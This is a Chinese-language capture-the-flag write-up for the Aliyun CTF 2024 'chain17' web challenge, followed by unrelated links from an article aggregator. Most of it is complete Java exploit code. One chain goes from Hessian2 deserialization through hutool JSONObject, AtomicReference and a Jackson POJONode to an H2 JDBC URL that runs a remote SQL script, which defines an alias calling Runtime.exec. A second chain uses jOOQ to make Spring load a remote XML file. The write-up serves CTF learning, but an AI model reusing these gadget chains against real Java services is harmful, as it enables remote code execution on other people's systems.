2024阿里云ctf-web-chain17学习

news2024/12/24 20:53:09

agent

jdk17依赖有h2思路清晰打jdbc attack

<dependency>  
    <groupId>org.springframework.boot</groupId>  
    <artifactId>spring-boot-starter-web</artifactId>  
</dependency>  

<!-- https://mvnrepository.com/artifact/com.alibaba/hessian-lite -->  
<dependency>  
    <groupId>com.alibaba</groupId>  
    <artifactId>hessian-lite</artifactId>  
    <version>3.2.13</version>  
</dependency>  

<dependency>  
    <groupId>cn.hutool</groupId>  
    <artifactId>hutool-all</artifactId>  
    <version>5.8.16</version>  
</dependency>  

<!-- https://mvnrepository.com/artifact/com.h2database/h2 -->  
<dependency>  
    <groupId>com.h2database</groupId>  
    <artifactId>h2</artifactId>  
    <version>2.2.224</version>  
</dependency>

项目
Deserial_Sink_With_JDBC
jdbc-attack
fork了一个师傅的github
发现没有
su18

H2 RCE
Spring Boot H2 console,by changing the connection url of h2 database,we can make spring boot run script from the remote.
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql'
And then prepare a statemate something like below to declare and call the Runtime.getRuntime().exec():
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('open -a Calculator.app')

看到了h2 rce

String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";  
// getConnection 触发漏洞  
Connection connection = DriverManager.getConnection(connectionUrl);  
connection.close();

安装h2数据库
h2数据库
python -m http.server 8001

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('calc')

可以拿到calc
使用codeql查询sink

使用尝试

还有一个把cn.h2%修改为cn.hutool%,找到

String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";
        Setting setting = new Setting();
        setting.setCharset(null);
        setting.set("url",connectionUrl);
        Unsafe unsafe = UnSafeTools.getUnsafe();
        PooledDSFactory pooledDSFactory = (PooledDSFactory) unsafe.allocateInstance(PooledDSFactory.class);
        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);
        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());

这样就查找能触发到toString的类来触发jackson的getter去调用getConnection
由于是hessian反序列化会触发map的put方法,
我们寻找一条到pojonode#toString的链子, 但是Hessian 的反序列化受module的影响,但是原生的反序列化并不受module 的影响,所以hessian后面就要用到Bean的原生反序列化了
发现codeql显示能调用到但是

 有限制,我们查找不继承这些接口的toString能触发pojonode#toString的方法,而且必须是jdk原生类
不然这个就满足了MutableObj
String#valueof和Object都满足
这样即可找到

确实可以触发
所以就是hessian2#readObject->AtomicReference#toString->String#valueof->POJONode#toString->h2的jdbc attack
使用codeql查找

hessian反序列化漏洞,是map反序列化,当他的_type不是null,且不是map和sortedMap时候,调用构造函数实例化

这时候生成了一个JSONObject变量,但是值为空

可以看到map将值put进去了两次反序列化
所以我们可以理解为,第一段Hessian2先创建一个JSONObject,
然后将两次反序列化的值作为key和value值
如何指定hessian2创建JSONObject呢

hessian2反序列化的序列化函数可以传入指定类型进去,并且设置this.buffer[this.offset++]是77这样反序列化的时候就会获取_type值为77
但是writeType有条件限制

private void writeType(String type) throws IOException {  
    this.flushIfFull();  
    int len = type.length();  
    if (len == 0) {  
        throw new IllegalArgumentException("empty type is not allowed");  
    } else {  
        if (this._typeRefs == null) {  
            this._typeRefs = new HashMap();  
        }  

        Integer typeRefV = (Integer)this._typeRefs.get(type);  
        if (typeRefV != null) {  
            int typeRef = typeRefV;  
            this.writeInt(typeRef);  
        } else {  
            this._typeRefs.put(type, this._typeRefs.size());  
            this.writeString(type);  
        }  

    }  
}

在HashMap里面push了一个type进去

这时候反序列化

调用了this.read()

public final int read() throws IOException {  
    return this._length <= this._offset && !this.readBuffer() ? -1 : this._buffer[this._offset++] & 255;  
}  

private final boolean readBuffer() throws IOException {  
    byte[] buffer = this._buffer;  
    int offset = this._offset;  
    int length = this._length;  
    if (offset < length) {  
        System.arraycopy(buffer, offset, buffer, 0, length - offset);  
        offset = length - offset;  
    } else {  
        offset = 0;  
    }  

    int len = this._is.read(buffer, offset, 256 - offset);  
    if (len <= 0) {  
        this._length = offset;  
        this._offset = 0;  
        return offset > 0;  
    } else {  
        this._length = offset + len;  
        this._offset = 0;  
        return true;  
    }  
}

读取缓冲区的值当this.readBuffer返回值为true的时候调用
this._buffer[this._offset++] & 255;
所以_offset这时候就为1

因为上面的writeBeginMap将tag设置为了77
通过readType读取

由于_offset为1,所以值是25
将offset-1,这时候offset读取就从2变成了1

 

 在进入读取

这时候tag值就为25,_offset值就为2

设置_sbuf的长度为0,设置_chunkLength长度为25,也就是cn.hutool.json.JSONObject的长度
所以后面就是从buf的25长度后面读25个字节,也就是把Type读出来cn.hutool.json.JSONObject
这时候我们知道如何指定type了,继续跟着往后面走

case 77:  
    type = this.readType();  
    return this.findSerializerFactory().readMap(this, type);
public Object readMap(AbstractHessianInput in, String type, Class<?> expectKeyType, Class<?> expectValueType) throws HessianProtocolException, IOException {  
    Deserializer deserializer = this.getDeserializer(type);  
    if (deserializer != null) {  
        return deserializer.readMap(in);  
    } else if (this._hashMapDeserializer != null) {  
        return this._hashMapDeserializer.readMap(in, expectKeyType, expectValueType);  
    } else {  
        this._hashMapDeserializer = new MapDeserializer(HashMap.class);  
        return this._hashMapDeserializer.readMap(in, expectKeyType, expectValueType);  
    }  
}

进入了这边, this.getDeserializer(type)获取了类型的反序列化
也就是获取了

当类型

public Object readMap(AbstractHessianInput in, Class<?> expectKeyType, Class<?> expectValueType) throws IOException {  
    Object map;  
    if (this._type == null) {  
        map = new HashMap();  
    } else if (this._type.equals(Map.class)) {  
        map = new HashMap();  
    } else if (this._type.equals(SortedMap.class)) {  
        map = new TreeMap();  
    } else {  
        try {  
            map = (Map)this._ctor.newInstance();  
        } catch (Exception var6) {  
            throw new IOExceptionWrapper(var6);  
        }  
    }  

    in.addRef(map);  
    this.doReadMap(in, (Map)map, expectKeyType, expectValueType);  
    in.readEnd();  
    return map
    }

这样就能newInstance了
在newInstance后调用了

this.doReadMap(in, (Map)map, expectKeyType, expectValueType);

in.isEnd()将buffer读取到了

也就是读完类名的值,也就是8,8也就是我们key的长度,再次反序列化,将offset的值就到
value反序列化开始的地方

获取到我们输入的key
 再次反序列化获取我们的value,就是走正常反序列化了
JSONObject调用put

然后JSONObject调用set

到最后调用到这个

public JSONObject set(String key, Object value, Filter<MutablePair<String, Object>> filter, boolean checkDuplicate) throws JSONException {  
    if (null == key) {  
        return this;  
    } else {  
        if (null != filter) {  
            MutablePair<String, Object> pair = new MutablePair(key, value);  
            if (!filter.accept(pair)) {  
                return this;  
            }  

            key = (String)pair.getKey();  
            value = pair.getValue();  
        }  

        boolean ignoreNullValue = this.config.isIgnoreNullValue();  
        if (ObjectUtil.isNull(value) && ignoreNullValue) {  
            this.remove(key);  
        } else {  
            if (checkDuplicate && this.containsKey(key)) {  
                throw new JSONException("Duplicate key \"{}\"", new Object[]{key});  
            }  

            super.put(key, JSONUtil.wrap(InternalJSONUtil.testValidity(value), this.config));  
        }  

        return this;  
    }  
}

调用了Object的toString也就是,

调用他的get函数
返回值也就是POJONode

String.ValueOf也就调用了value的toString

所以我们的思路就是

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();  
Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);  

hessian2Output.writeMapBegin(JSONObject.class.getName());  
hessian2Output.writeObject("whatever");

POJONode pojoNode = new POJONode(bean);  

Object object = new AtomicReference<>(pojoNode);
hessian2Output.writeObject(object);  
hessian2Output.writeMapEnd();  
hessian2Output.close();

这样就能触发pojonode
所以payload就是

package com.aliyunctf.agent;
import cn.hutool.core.map.SafeConcurrentHashMap;
import cn.hutool.db.ds.pooled.PooledDSFactory;
import cn.hutool.json.JSONObject;
import cn.hutool.setting.Setting;
import com.alibaba.com.caucho.hessian.io.Hessian2Input;
import com.alibaba.com.caucho.hessian.io.Hessian2Output;
import com.aliyunctf.agent.other.Bean;
import com.fasterxml.jackson.databind.node.POJONode;
import com.n1ght.serial.SerialTools;
import com.n1ght.unsafe.UnSafeTools;
import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.util.Base64;
import java.util.concurrent.atomic.AtomicReference;

public class Main {
    public static void main(String[] args) throws Exception {
//--add-opens java.base/java.math=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED
        String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";
        Setting setting = new Setting();
        setting.setCharset(null);
        setting.set("url",connectionUrl);
        Unsafe unsafe = UnSafeTools.getUnsafe();
        PooledDSFactory pooledDSFactory = (PooledDSFactory) unsafe.allocateInstance(PooledDSFactory.class);
        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);
        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());
        Bean bean = new Bean();
        UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);
        hessian2Output.writeMapBegin(JSONObject.class.getName());
        hessian2Output.writeObject("whatever");
        POJONode pojoNode = new POJONode(bean);
        Object object = new AtomicReference<>(pojoNode);
        hessian2Output.writeObject(object);
        hessian2Output.writeMapEnd();
        hessian2Output.close();

        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        Hessian2Input hessian2Input = new Hessian2Input((InputStream)byteArrayInputStream);
        hessian2Input.readObject();
    }
}

但是为什么jackson的toString触发getObject后,就能再次触发PooledDSFactory的getter
BeanSerializerBase#serializeFields

在这边看到了BeanPropertyWriter#serializeAsField

Object value = this._accessorMethod == null ? this._field.get(bean) : this._accessorMethod.invoke(bean, (Object[])null);
        if (value == null) {
            if (this._suppressableValue == null || !prov.includeFilterSuppressNulls(this._suppressableValue)) {
                if (this._nullSerializer != null) {
                    gen.writeFieldName(this._name);
                    this._nullSerializer.serialize((Object)null, gen, prov);
                }

            }
        } else {
            JsonSerializer<Object> ser = this._serializer;
            if (ser == null) {
                Class<?> cls = value.getClass();
                PropertySerializerMap m = this._dynamicSerializers;
                ser = m.serializerFor(cls);
                if (ser == null) {
                    ser = this._findAndAddDynamic(m, cls, prov);
                }
            }

            if (this._suppressableValue != null) {
                if (MARKER_FOR_EMPTY == this._suppressableValue) {
                    if (ser.isEmpty(prov, value)) {
                        return;
                    }
                } else if (this._suppressableValue.equals(value)) {
                    return;
                }
            }

            if (value != bean || !this._handleSelfReference(bean, gen, prov, ser)) {
                gen.writeFieldName(this._name);
                if (this._typeSerializer == null) {
                    ser.serialize(value, gen, prov);
                } else {
                    ser.serializeWithType(value, gen, prov, this._typeSerializer);
                }

            }
        }

当获取值后,对value再次进行序列化

Object value = this._accessorMethod == null ? this._field.get(bean) : this._accessorMethod.invoke(bean, (Object[])null);
//这边就是getter后的值


也就是调用getObject后获取的值
然后对他获取的值再次进行序列化也就再次走到了这

也就是调用了PooledDSFactory的getConnection

我们之前上面找的JdbcDataSource有问题,我修改了什么地方让他成功呢

问题就在

有debug问题,fastjson的序列化问题是
Error: java.io.NotSerializableException: org.h2.jdbcx.JdbcDataSourceFactory
这样导致trace设置不了,debugCodeCall会进行判断,导致无法执行connect
所以我们使用

H2DataSource jdbcDataSource = (H2DataSource) unsafe.allocateInstance(H2DataSource.class);

unsafe.allocateInstance实例化这样不会带不可序列化的数据,我们set即可
我重写的类

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.aliyunctf.agent;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.PrintWriter;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Properties;
import java.util.logging.Logger;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.DataSource;
import javax.sql.PooledConnection;
import javax.sql.XAConnection;
import javax.sql.XADataSource;
import org.h2.jdbc.JdbcConnection;
import org.h2.jdbcx.JdbcDataSourceBackwardsCompat;
import org.h2.jdbcx.JdbcDataSourceFactory;
import org.h2.jdbcx.JdbcXAConnection;
import org.h2.message.DbException;
import org.h2.message.Trace;
import org.h2.message.TraceObject;
import org.h2.message.TraceSystem;
import org.h2.util.StringUtils;

public final class H2DataSource extends TraceObject implements XADataSource, DataSource, ConnectionPoolDataSource, Serializable, Referenceable, JdbcDataSourceBackwardsCompat {
    private static final long serialVersionUID = 1288136338451857771L;
    private  JdbcDataSourceFactory factory;
    private transient PrintWriter logWriter;
    private int loginTimeout;
    private String userName = "";
    private char[] passwordChars = new char[0];
    private String url = "";
    private String description;
    private Trace trace;

    public Trace getTrace() {
        return trace;
    }

    public void setTrace(Trace trace) {
        this.trace = trace;
    }

    public H2DataSource(){
        this.initFactory();
        int var1 = getNextId(12);
        this.setTrace(trace, 12, var1);
    }

    private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
        this.initFactory();
        var1.defaultReadObject();
    }

    private void initFactory() {
        this.factory = new JdbcDataSourceFactory();
    }

    public int getLoginTimeout() {
        return this.loginTimeout;
    }

    public void setLoginTimeout(int var1) {
        this.loginTimeout = var1;
    }

    public PrintWriter getLogWriter() {
        return this.logWriter;
    }

    public void setLogWriter(PrintWriter var1) {
        this.debugCodeCall("setLogWriter(out)");
        this.logWriter = var1;
    }

    public Connection getConnection() throws SQLException {
        return new JdbcConnection(this.url, (Properties)null, this.userName, StringUtils.cloneCharArray(this.passwordChars), false);
    }

    public Connection getConnection(String var1, String var2) throws SQLException {
        if (this.isDebugEnabled()) {
            this.debugCode("getConnection(" + quote(var1) + ", \"\")");
        }

        return new JdbcConnection(this.url, (Properties)null, var1, var2, false);
    }

    public String getURL() {
        this.debugCodeCall("getURL");
        return this.url;
    }

    public void setURL(String var1) {
        this.url = var1;
    }

    public String getUrl() {
        this.debugCodeCall("getUrl");
        return this.url;
    }

    public void setUrl(String var1) {
        this.debugCodeCall("setUrl", var1);
        this.url = var1;
    }

    public void setPassword(String var1) {
        this.debugCodeCall("setPassword", "");
        this.passwordChars = var1 == null ? null : var1.toCharArray();
    }

    public void setPasswordChars(char[] var1) {
        if (this.isDebugEnabled()) {
            this.debugCode("setPasswordChars(new char[0])");
        }

        this.passwordChars = var1;
    }

    private static String convertToString(char[] var0) {
        return var0 == null ? null : new String(var0);
    }

    public String getPassword() {
        this.debugCodeCall("getPassword");
        return convertToString(this.passwordChars);
    }

    public String getUser() {
        this.debugCodeCall("getUser");
        return this.userName;
    }

    public void setUser(String var1) {
        this.debugCodeCall("setUser", var1);
        this.userName = var1;
    }

    public String getDescription() {
        this.debugCodeCall("getDescription");
        return this.description;
    }

    public void setDescription(String var1) {
        this.debugCodeCall("getDescription", var1);
        this.description = var1;
    }

    public Reference getReference() {
        this.debugCodeCall("getReference");
        String var1 = JdbcDataSourceFactory.class.getName();
        Reference var2 = new Reference(this.getClass().getName(), var1, (String)null);
        var2.add(new StringRefAddr("url", this.url));
        var2.add(new StringRefAddr("user", this.userName));
        var2.add(new StringRefAddr("password", convertToString(this.passwordChars)));
        var2.add(new StringRefAddr("loginTimeout", Integer.toString(this.loginTimeout)));
        var2.add(new StringRefAddr("description", this.description));
        return var2;
    }

    public XAConnection getXAConnection() throws SQLException {
        this.debugCodeCall("getXAConnection");
        return null;
    }

    public XAConnection getXAConnection(String var1, String var2) throws SQLException {
        if (this.isDebugEnabled()) {
            this.debugCode("getXAConnection(" + quote(var1) + ", \"\")");
        }

        return null;
    }

    public PooledConnection getPooledConnection() throws SQLException {
        this.debugCodeCall("getPooledConnection");
        return this.getXAConnection();
    }

    public PooledConnection getPooledConnection(String var1, String var2) throws SQLException {
        if (this.isDebugEnabled()) {
            this.debugCode("getPooledConnection(" + quote(var1) + ", \"\")");
        }

        return this.getXAConnection(var1, var2);
    }

    public <T> T unwrap(Class<T> var1) throws SQLException {
        try {
            if (this.isWrapperFor(var1)) {
                return (T) this;
            } else {
                throw DbException.getInvalidValueException("iface", var1);
            }
        } catch (Exception var3) {
            throw this.logAndConvert(var3);
        }
    }

    public boolean isWrapperFor(Class<?> var1) throws SQLException {
        return var1 != null && var1.isAssignableFrom(this.getClass());
    }

    public Logger getParentLogger() {
        return null;
    }

    public String toString() {
        return this.getTraceObjectName() + ": url=" + this.url + " user=" + this.userName;
    }
}

payload:

String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";

        Bean bean = new Bean();
//        Setting setting = new Setting();
//        setting.setCharset(null);
//        setting.set("url",connectionUrl);
        Unsafe unsafe = UnSafeTools.getUnsafe();
//        PooledDSFactory pooledDSFactory = (PooledDSFactory) unsafe.allocateInstance(PooledDSFactory.class);
//        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);
//        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());
//        UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));

        H2DataSource jdbcDataSource = (H2DataSource) unsafe.allocateInstance(H2DataSource.class);

        jdbcDataSource.setURL(connectionUrl);
        jdbcDataSource.setLoginTimeout(5);

        Object o = SourceTools.getterJacksonProxy(jdbcDataSource, DataSource.class);
        UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(o)));

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);
        hessian2Output.writeMapBegin(JSONObject.class.getName());
        hessian2Output.writeObject("whatever");
        POJONode pojoNode = new POJONode(bean);
        Object object = new AtomicReference<>(pojoNode);
        hessian2Output.writeObject(object);
        hessian2Output.writeMapEnd();
        hessian2Output.close();

        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        Hessian2Input hessian2Input = new Hessian2Input((InputStream)byteArrayInputStream);
        hessian2Input.readObject();

这样拿取shell就可达到第二条,像第二条发送payload去打通
第二条的trace一直没加载进去,很奇怪,原生类序列化能不能打进去呢

之前继承的SimpleDSFactory也可以

package com.aliyunctf.agent;
import cn.hutool.core.map.SafeConcurrentHashMap;
import cn.hutool.db.ds.c3p0.C3p0DSFactory;
import cn.hutool.db.ds.druid.DruidDSFactory;
import cn.hutool.db.ds.jndi.JndiDSFactory;
import cn.hutool.db.ds.pooled.PooledDSFactory;
import cn.hutool.db.ds.simple.SimpleDSFactory;
import cn.hutool.db.ds.tomcat.TomcatDSFactory;
import cn.hutool.json.JSONObject;
import cn.hutool.setting.Setting;
import com.alibaba.com.caucho.hessian.io.Hessian2Input;
import com.alibaba.com.caucho.hessian.io.Hessian2Output;
import com.aliyunctf.agent.other.Bean;
import com.fasterxml.jackson.databind.node.POJONode;
import com.n1ght.serial.SerialTools;
import com.n1ght.source.SourceTools;
import com.n1ght.unsafe.UnSafeTools;
import org.h2.jdbcx.JdbcDataSource;
import org.h2.jdbcx.JdbcDataSourceFactory;
import org.h2.message.Trace;
import org.h2.message.TraceObject;
import org.h2.message.TraceSystem;
import sun.misc.Unsafe;
import javax.sql.DataSource;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.concurrent.atomic.AtomicReference;

public class Main {
    public static void main(String[] args) throws Exception {
//--add-opens java.base/java.math=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/javax.swing.undo=ALL-UNNAMED --add-opens java.desktop/javax.swing.event=ALL-UNNAMED --add-opens java.xml/com.sun.org.apache.xpath.internal.objects=ALL-UNNAMED
        String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";

        Bean bean = new Bean();
        Setting setting = new Setting();
        setting.setCharset(null);
        setting.set("url",connectionUrl);
        Unsafe unsafe = UnSafeTools.getUnsafe();
        SimpleDSFactory pooledDSFactory = (SimpleDSFactory) unsafe.allocateInstance(SimpleDSFactory.class);
        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);
        UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());
        UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));



        UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));


        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);
        hessian2Output.writeMapBegin(JSONObject.class.getName());
        hessian2Output.writeObject("whatever");
        POJONode pojoNode = new POJONode(bean);
        Object object = new AtomicReference<>(pojoNode);
        hessian2Output.writeObject(object);
        hessian2Output.writeMapEnd();
        hessian2Output.close();

        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        Hessian2Input hessian2Input = new Hessian2Input((InputStream)byteArrayInputStream);
        hessian2Input.readObject();
    }
}

只有开了--add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED
可以成功

server

使用查找,分了两步

即可
payload

package com.aliyunctf.server;

import com.fasterxml.jackson.databind.node.POJONode;
import com.n1ght.reflect.ReflectTools;
import com.n1ght.serial.SerialTools;
import com.n1ght.unsafe.UnSafeTools;
import org.jooq.DataType;
import org.springframework.context.support.ClassPathXmlApplicationContext;

import javax.swing.event.EventListenerList;
import javax.swing.undo.UndoManager;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Vector;

public class Main {
    public static void main(String[] args) throws Exception {
        String url = "http://127.0.0.1:1234/poc.xml";

        Class clazz1 = Class.forName("org.jooq.impl.Dual");
        Constructor constructor1 = clazz1.getDeclaredConstructors()[0];
        constructor1.setAccessible(true);
        Object table = constructor1.newInstance();

        Class clazz2 = Class.forName("org.jooq.impl.TableDataType");
        Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
        constructor2.setAccessible(true);
        Object tableDataType = constructor2.newInstance(table);

        Class clazz3 = Class.forName("org.jooq.impl.Val");
        Constructor constructor3 = clazz3.getDeclaredConstructor(Object.class, DataType.class, boolean.class);
        constructor3.setAccessible(true);
        Object val = constructor3.newInstance("whatever", tableDataType, false);

        Class clazz4 = Class.forName("org.jooq.impl.ConvertedVal");
        Constructor constructor4 = clazz4.getDeclaredConstructors()[0];
        constructor4.setAccessible(true);
        Object convertedVal = constructor4.newInstance(val, tableDataType);

        Object value = url;
        Class type = ClassPathXmlApplicationContext.class;

        UnSafeTools.setObject(val,val.getClass().getSuperclass().getDeclaredField("value"),value);
        UnSafeTools.setObject(tableDataType,tableDataType.getClass().getSuperclass().getDeclaredField("uType"),type);



        POJONode pojoNode = new POJONode(convertedVal);

        EventListenerList eventListenerList = new EventListenerList();
        UndoManager undoManager = new UndoManager();
        Vector vector = (Vector) ReflectTools.getFieldValue(undoManager, "edits");
        vector.add(pojoNode);
        ReflectTools.setFieldValue(eventListenerList, "listenerList", new Object[]{InternalError.class, undoManager});

        String s = SerialTools.base64Serial(eventListenerList);
        System.out.println(s);
        SerialTools.base64DeSerial(s);

    }

}

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1643646.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

踏春正当时!VELO Prevail Ride带你探索多元骑行潮流体验~

嘿&#xff0c;朋友&#xff01;踏春正当时嘞&#xff01;在这个追求个性化与多元化的新时代&#xff0c;骑行爱好者们也开始寻找能适应各种骑行场景的理想坐垫。从悠闲自在的日常通勤&#xff0c;到热血沸腾的公路竞速&#xff0c;再到勇攀高峰的山地探险&#xff0c;维乐VELO…

更深层次理解传输层两协议【UDP | TCP】【UDP 缓冲区 | TCP 8种策略 | 三次握手四次挥手】

博客主页&#xff1a;花果山~程序猿-CSDN博客 文章分栏&#xff1a;Linux_花果山~程序猿的博客-CSDN博客 关注我一起学习&#xff0c;一起进步&#xff0c;一起探索编程的无限可能吧&#xff01;让我们一起努力&#xff0c;一起成长&#xff01; 目录 再谈端口号 端口号的返回…

C语言-整体内容简单的认识

目录 一、数据类型的介绍二、数据的变量和常量三、变量的作用域和生命周期四、字符串五、转义字符六、操作符六、常见的关键字6.1 关键字static 七、内存分配八、结构体九、指针 一、数据类型的介绍 sizeof是一个操作符&#xff0c;是计算机类型/变量所占内存空间的大小   sc…

AEC Capital Limited:开启可持续金融新纪元

在当今社会&#xff0c;环保和可持续发展已成为全球关注的焦点。在这个背景下&#xff0c;AEC Capital Limited作为香港的一家金融服务公司&#xff0c;以其专业、高端的服务和创新的理念&#xff0c;成为可持续金融领域的引领者。我们致力于将环境保护与金融服务相结合&#x…

设计模式之拦截过滤器模式

想象一下&#xff0c;在你的Java应用里&#xff0c;每个请求就像一场冒险旅程&#xff0c;途中需要经过层层安检和特殊处理。这时候&#xff0c;拦截过滤器模式就化身为你最可靠的特工团队&#xff0c;悄无声息地为每一个请求保驾护航&#xff0c;确保它们安全、高效地到达目的…

触动精灵纯本地离线文字识别插件

目的 触动精灵是一款可以模拟鼠标和键盘操作的自动化工具。它可以帮助用户自动完成一些重复的、繁琐的任务&#xff0c;节省大量人工操作的时间。但触动精灵的图色功能比较单一&#xff0c;无法识别屏幕上的图像&#xff0c;根据图像的变化自动执行相应的操作。本篇文章主要讲解…

C语言二分查找的区间问题

概念 什么是二分查找呢&#xff1f; 二分查找&#xff1a;在有序数组中查找某一特定元素的搜索算法。 二分查找又称折半查找&#xff0c;通过将数组折半&#xff0c;用中间值和查找值作比较&#xff0c;多次使用&#xff0c;直到找到要查找的值。 注意:二分查找的前提是&#…

内核workqueue框架

workqueue驱动的底半部实现方式之一就是工作队列&#xff0c;作为内核的标准模块&#xff0c;它的使用接口也非常简单&#xff0c;schedule_work或者指定派生到哪个cpu的schedule_work_on。 还有部分场景会使用自定义的workqueue&#xff0c;这种情况会直接调用queue_work和qu…

JavaScript的操作符运算符

前言&#xff1a; JavaScript的运算符与C/C一致 算数运算符&#xff1a; 算数运算符说明加-减*乘%除/取余 递增递减运算符&#xff1a; 运算符说明递增1-- 递减1 补充&#xff1a; 令a1&#xff0c;b1 运算a b ab12ab22ab--10a--b00 比较(关系)运算符&#xff1a; 运算…

服务器端集群优化-集群还是主从

7、服务器端集群优化-集群还是主从 集群虽然具备高可用特性&#xff0c;能实现自动故障恢复&#xff0c;但是如果使用不当&#xff0c;也会存在一些问题&#xff1a; 集群完整性问题集群带宽问题数据倾斜问题客户端性能问题命令的集群兼容性问题lua和事务问题 问题1、在Redi…

[Spring Cloud] (6)gateway整体加解密

文章目录 简述整体效果后端增加配置nacos增加配置GlobalConfig 添加请求整体解密拦截器DecryptionFilter添加响应整体解密拦截器EncryptionFilter 前端请求拦截器添加整体加密逻辑请求头中添加sessionId 响应拦截器添加整体解密逻辑 简述 本文网关gateway&#xff0c;微服务&a…

VsCode插件 -- Power Mode

一、安装插件 1. 首先在扩展市场里搜索 Power Mode 插件&#xff0c;如下图 二、配置插件 设置 点击小齿轮 打上勾 就可以了 第二种设置方法 1. 安装完成之后&#xff0c;使用快捷键 Ctrl Shift P 打开命令面板&#xff0c;在命令行中输入 settings.json &#xff0c; 选择首…

扩展学习|结合故事的力量和数字的力量:混合方法研究和混合研究综述

文献来源&#xff1a;Pluye, Pierre, and Quan Nha Hong. "Combining the power of stories and the power of numbers: mixed methods research and mixed studies reviews." Annual review of public health 35 (2014): 29-45. 文献获取&#xff1a;链接&#xff1…

【机器视觉】yolo-world-opencvsharp-.net4.8 C# 窗体应用程序

